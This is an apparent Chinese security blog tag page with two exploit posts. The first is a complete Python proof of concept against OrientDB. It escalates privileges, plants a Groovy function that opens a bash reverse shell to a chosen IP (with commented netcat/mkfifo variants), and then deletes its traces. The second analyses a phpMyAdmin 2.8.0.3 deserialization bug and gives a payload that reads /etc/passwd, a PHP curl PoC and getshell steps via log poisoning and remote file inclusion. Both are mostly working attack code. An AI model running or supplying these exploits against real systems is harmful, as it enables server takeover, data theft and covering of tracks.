标签 代码执行 下的文章

OrientDB代码执行漏洞

漏洞详情

PoC

运行Netcat

nc -lv 8081

PoC.py

import sys
import requests
import json
import string
import random
 
target = sys.argv[1]
 
try:
    port = sys.argv[2] if sys.argv[2] else 2480
except:
    port = 2480
 
url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)
 
 
def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
def enum_databases(target,port="2480"):
 
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)
 
    if req.status_code == 200:
        #print "[+] Database Enumeration successful"
        database = req.json()['databases']
 
        return database
 
    return False
 
def check_version(target,port="2480"):
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)
 
    if req.status_code == 200:
 
        headers = req.headers['server']
        #print headers
        if "2.2" in headers or "3." in headers:
            return True
 
    return False
 
def run_queries(permission,db,content=""):
 
    databases = enum_databases(target)
 
    url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])
 
    priv_enable = ["create","read","update","execute","delete"]
    #query = "GRANT create ON database.class.ouser TO writer"
 
    for priv in priv_enable:
 
        if permission == "GRANT":
            query = "GRANT %s ON %s TO writer"%(priv,db)
        else:
            query = "REVOKE %s ON %s FROM writer"%(priv,db)
        req = requests.post(url,data=query,auth=('writer','writer'))
        if req.status_code == 200:
            pass
        else:
            if priv == "execute":
                return True
            return False
 
    print "[+] %s"%(content)
    return True
 
def priv_escalation(target,port="2480"):
 
    print "[+] Checking OrientDB Database version is greater than 2.2"
 
    if check_version(target,port):
 
        priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function")
        priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function")
        priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters")
 
        if priv1 and priv2 and priv3:
            return True
 
    return False
 
def exploit(target,port="2480"):
 
    #query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'
 
    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":None}
 
    func_name = random_function_name()
 
    print func_name
 
    databases = enum_databases(target)
 
    reverse_ip = raw_input('Enter the ip to connect back: ')
 
    query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\\"hello.sh\\");file.delete();file << (\\"#!/bin/bash\\\\n\\");file << (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
    #query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a     file.delete()       \u000a     file << (\"#!/bin/bash\")\u000a     file << (command)\n    def proc = \"bash hello.sh\".execute() ","parameters":null}'
    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute();","parameters":None}
    req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))
 
    if req.status_code == 201:
 
        #print req.status_code
        #print req.json()
 
        func_id = req.json()['@rid'].strip("#")
        #print func_id
 
        print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)
 
        req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
        #print req.status_code
        #print req.text
 
        if req.status_code == 200:
            print "[+] Open netcat at port 8081.."
        else:
            print "[+] Exploitation failed at last step, try running the script again."
            print req.status_code
            print req.text
 
        #print "[+] Deleting traces.."
 
        req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
        priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
        priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
        priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters")
 
        #print req.status_code
        #print req.text
 
def main():
 
    target = sys.argv[1]
    #port = sys.argv[1] if sys.argv[1] else 2480
    try:
        port = sys.argv[2] if sys.argv[2] else 2480
        #print port
    except:
        port = 2480
    if priv_escalation(target,port):
        exploit(target,port)
    else:
        print "[+] Target not vulnerable"
 
main()

命令:

python PoC.py ip [port] // 默认使用2480端口

poc1.png

poc2.png

修复方案

PhpMyAdmin某版本无需登录任意文件包含导致代码执行(可getshell)漏洞分析

首发:http://www.mottoin.com/87915.html

前言

这个漏洞来源于路人甲在wooyun提交的漏洞

漏洞编号: WooYun-2016-199433

1x.png

4月12日也曾在t00ls发表过,但是帖子关闭了

(详细漏洞文档可进群索取)

分析

存在漏洞的已知版本为 2.8.0.3 其余版本未知

本次测试的版本为2.8.0.3

看存在漏洞的文件代码

/scripts/setup.php

图片1.png

把传入的configuration给反序列化,而这个setup.php中引入了common.lib.php

来到common.lib.php

图片2.png

common.lib.php中引入了Config.class.php

再看看Config.class.php

M7jmQrI.png

继续看load方法:

图片4-1.png

Config.class.php中含有__wakeup魔术方法,因此可以构造序列化参数,造成反序列化漏洞

所以整个思路就是:

setup.php->common.lib.php->Config.class.php->__wakeup()->load()->eval();

漏洞验证

构造个简单的poc:

url:

http://localhost/phpmyadmin/scripts/setup.php

post data:

configuration=O:10:”PMA_Config”:1:{s:6:”source”;s:11:”/etc/passwd”;}&action=test

mac下测试:

图片5-1.png

Win下:

图片6-1.png

提供一个PHP版PoC:

<?php
class PMA_Config
{
public $source;
}
$t = new PMA_Config();
$t -> source = $_GET['file'];
$str = serialize($t);
$url = $_GET['url'];
$data = "configuration=".$str."&action=test";
echo $data;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POST,true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
echo curl_exec($ch); 
?>

Getshell

  • 利用方式一

但是经过分析这个漏洞是不能读取php文件的,因为有了eval(),相当于任意文件包含了,不过另一方面这也是有好处的,如果能写入文件,文件中包含一个一句话就可以直接getshell了。作者给的方式是用error log。

根据作者的方法,使用默认环境,才发现有点鸡肋,比如,在ubuntu下,一般是不允许用root权限运行,实际测试中,我们是无法读取access.log的,所以getshell就比较困难。在windows下,由于几乎所有的浏览器和python模块都会很“自觉地”将特殊字符编码进行转换”,getshell就更困难了,所以只能用socket去构造shell。

图片7-1.png

Access log中就出现了shell了。

图片8-1.png

再用任意文件包含漏洞去包含,就可以拿到shell了。

图片9-1.png

  • 利用方式二

PoC修改为如下:

poc2.png

通过FTP直接远程利用获取shell

前提是看file_get_contents可不可以远程(默认是开启的)

影响范围

  • 存在漏洞的已知版本为 2.8.0.3 其余版本未知
  • 许多内网的系统都在用这个版本,外网的也绝非少数!

修复建议

  • 尽快升级到最新版
  • setup.php中28行中的”configuration”改为传入其他值
  • 直接删除scripts目录,防止被恶意攻击